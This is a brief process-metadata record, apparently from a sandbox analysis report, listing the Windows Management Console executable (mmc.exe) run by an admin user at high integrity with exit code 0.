Path
C:\WINDOWS\system32\mmc.exe
Indicators
Parent process
––
User
admin
Integrity Level
HIGH
Exit code
0
Version:
Company
Microsoft Corporation